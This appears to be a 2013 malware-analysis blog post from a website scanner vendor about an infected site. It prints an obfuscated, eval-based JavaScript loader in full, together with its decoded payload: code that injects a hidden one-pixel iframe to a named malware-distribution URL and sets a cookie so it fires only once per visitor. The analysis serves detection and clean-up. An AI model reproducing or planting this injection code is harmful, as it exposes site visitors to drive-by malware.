Wednesday, August 14, 2013

Malicious JavaScript code injecting hidden iframe to malware domain

Website infected with malicious obfuscated JavaScript that injects hidden iframe to blacklisted malicious domain

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This compromised website has suspicious JavaScript code injected in files. Malware was found on this website's pages by Google Safe Browsing including 17 exploits.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Website malware scanner report

Submission date: Mon Aug 12 09:07:59 2013
Infected website's files: 9
Website malware scan report link: Sitescan report link

Quttera | online website malware scanner.
Quttera website malware scanner.



Threat dump:

Quttera website malware scanner. Malicious JavaScript detected on scanned website
Quttera website malware scanner. Malicious JavaScript detected on scanned website




Malware entry details

Beautified script

  1. aq = "0x";
  2. ff = String;
  3. fff = "fromCh" + "a" + "rCode";
  4. ff = ff[fff];
  5. zz = 3;
  6. try {
  7.     document.body ^= ~1;
  8. } catch (z1z1) {
  9.     v = 123;
  10.     vzs = 0;
  11.     try {
  12.         document;
  13.     } catch (q) {
  14.         vzs = 1;
  15.     }
  16.     if (!vzs) e = eval;
  17.     if (1) {
  18.         f ="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5b,6a,6c,65,66,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,5c,6a,61,6e,5d,65,67,6c,61,67,66,26,68,64,27,5c,59,6c,59,27,6a,5d,64,26,68,60,68,1f,33,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,5b,6a,6c,65,66,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,5b,6a,6c,65,66,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,5b,6a,6c,65,66,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,5b,6a,6c,65,66,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,5b,6a,6c,65,66,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");
  19.     }
  20.     w = f;
  21.     s = [];
  22.     if (window.document)
  23.         for (= 2 - 2; - i + 1405 != 0; i += 1) {
  24.             j = i;
  25.             if ((031 == 0x19))
  26.                 if (e) s = s + ff(e(aq + (w[j])) + 8);
  27.         }
  28.     xz = e;
  29.     if (window.document) xz(s)
  30. }


Malicious payload


Decoded payload injects hidden malicious iframe to http://www.drivemotion.pl/data/rel.php

  1. function zzzfff() {
  2.  
  3.     var crtmn = document.createElement('iframe');
  4.  
  5.  
  6.  
  7.     crtmn.src = 'http://www.drivemotion.pl/data/rel.php';
  8.  
  9.     crtmn.style.position = 'absolute';
  10.  
  11.     crtmn.style.border = '0';
  12.  
  13.     crtmn.style.height = '1px';
  14.  
  15.     crtmn.style.width = '1px';
  16.  
  17.     crtmn.style.left = '1px';
  18.  
  19.     crtmn.style.top = '1px';
  20.  
  21.  
  22.  
  23.     if (!document.getElementById('crtmn')) {
  24.  
  25.         document.write('<div id=\'crtmn\'></div>');
  26.  
  27.         document.getElementById('crtmn').appendChild(crtmn);
  28.  
  29.     }
  30.  
  31. }
  32.  
  33. function SetCookie(cookieName, cookieValue, nDays, path) {
  34.  
  35.     var today = new Date();
  36.  
  37.     var expire = new Date();
  38.  
  39.     if (nDays == null || nDays == 0) nDays = 1;
  40.  
  41.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  42.  
  43.     document.cookie = cookieName + "=" + escape(cookieValue)
  44.  
  45.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  46.  
  47. }
  48.  
  49. function GetCookie(name) {
  50.  
  51.     var start = document.cookie.indexOf(name + "=");
  52.  
  53.     var len = start + name.length + 1;
  54.  
  55.     if ((!start) &&
  56.  
  57.         (name != document.cookie.substring(0, name.length)))
  58.  
  59.     {
  60.  
  61.         return null;
  62.  
  63.     }
  64.  
  65.     if (start == -1) return null;
  66.  
  67.     var end = document.cookie.indexOf(";", len);
  68.  
  69.     if (end == -1) end = document.cookie.length;
  70.  
  71.     return unescape(document.cookie.substring(len, end));
  72.  
  73. }
  74.  
  75. if (navigator.cookieEnabled)
  76.  
  77. {
  78.  
  79.     if (GetCookie('visited_uq') == 55) {} else {
  80.         SetCookie('visited_uq', '55', '1', '/');
  81.  
  82.  
  83.  
  84.         zzzfff();
  85.  
  86.     }
  87.  
  88. }

Similar payloads analysis can be found here.

Blacklisting status

Website is Blacklisted by Google Safe Browsing


Blacklisted by Google



Redirect domain is Blacklisted by Google Safe Browsing. It was functioning as intermediate to infect 14 other websites.


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.